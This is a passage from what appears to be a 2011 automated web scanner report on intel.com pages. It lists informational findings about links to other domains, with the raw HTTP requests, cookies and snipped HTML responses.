INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<noscript>
<a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.42. http://www.intel.com/about/corporateresponsibility/education/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/education/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/corporateresponsibility/education/index.htm?iid=gg_about+intel_education
The response contains the following links to other domains:
  • http://twitter.com/intelinspire
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.facebook.com/pages/Intel-Inspire/32855637280
  • http://www.inspiredbyeducation.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/corporateresponsibility/education/index.htm?iid=gg_about+intel_education HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46876

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.inspiredbyeducation.com" target="_blank" title="Inspired by Education" onclick="this.href += query_string">Inspired by Education</a>
...[SNIP]...
<li><a href="http://twitter.com/intelinspire" target="_blank" title="Twitter" onclick="this.href += query_string">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Intel-Inspire/32855637280" target="_blank" title="Facebook" onclick="this.href += query_string">Facebook</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.43. http://www.intel.com/about/corporateresponsibility/environment/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/environment/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/corporateresponsibility/environment/index.htm?iid=gg_about+intel_environment
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.newsweek.com/2010/10/18/green-rankings-us-companies.html

Request

GET /about/corporateresponsibility/environment/index.htm?iid=gg_about+intel_environment HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<noscript>
<a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a>
...[SNIP]...
<li><a class="metrics-event" href="http://www.newsweek.com/2010/10/18/green-rankings-us-companies.html" target="_blank"><strong>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.44. http://www.intel.com/about/corporateresponsibility/foundation/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/foundation/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation
The response contains the following links to other domains:
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:33 GMT
Content-Length: 31901
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<noscript>
<a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.45. http://www.intel.com/about/corporateresponsibility/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/corporateresponsibility/index.htm?iid=subhdr+cr
The response contains the following links to other domains:
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/corporateresponsibility/index.htm?iid=subhdr+cr HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947641944; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorp%2Cintelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:13:35 GMT
Connection: close
Content-Length: 27286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.46. http://www.intel.com/about/corporateresponsibility/report/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/report/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/corporateresponsibility/report/index.htm?iid=subhdr+cr_report
The response contains the following links to other domains:
  • http://twitter.com/intel_CSR
  • http://twitter.com/intelinspire
  • http://twitter.com/sfallender
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/corporateresponsibility/report/index.htm?iid=subhdr+cr_report HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<noscript>
<a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a>
...[SNIP]...
<li><a href="http://twitter.com/intel_CSR" target="_blank">@intel_CSR</a>
...[SNIP]...
<li><a href="http://twitter.com/intelinspire" target="_blank">@intelinspire</a>
...[SNIP]...
<li><a href="http://twitter.com/sfallender" target="_blank">@sfallender</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.47. http://www.intel.com/about/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
The response contains the following links to other domains:
  • http://www.careinnovations.com/Products
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/index.htm?iid=gg_about-en_US+intel_aboutintel HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/?en_US_01
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers; s_lv=1296947560708; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/index.htm; s_sq=intelcorp%2Cintelcorpcim%3D%2526pid%253Dcim%25253A/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/index.htm%25253Fiid%25253Dgg_about-en_US%25252Bintel_aboutintel%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:14 GMT
Connection: close
Content-Length: 27087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/" target="_blank">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.careinnovations.com/Products" target="_blank">Intel-GE Care Innovations LLC</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.48. http://www.intel.com/about/map/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/map/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/map/index.htm?iid=subhdr+cr_globe
The response contains the following links to other domains:
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/map/index.htm?iid=subhdr+cr_globe HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
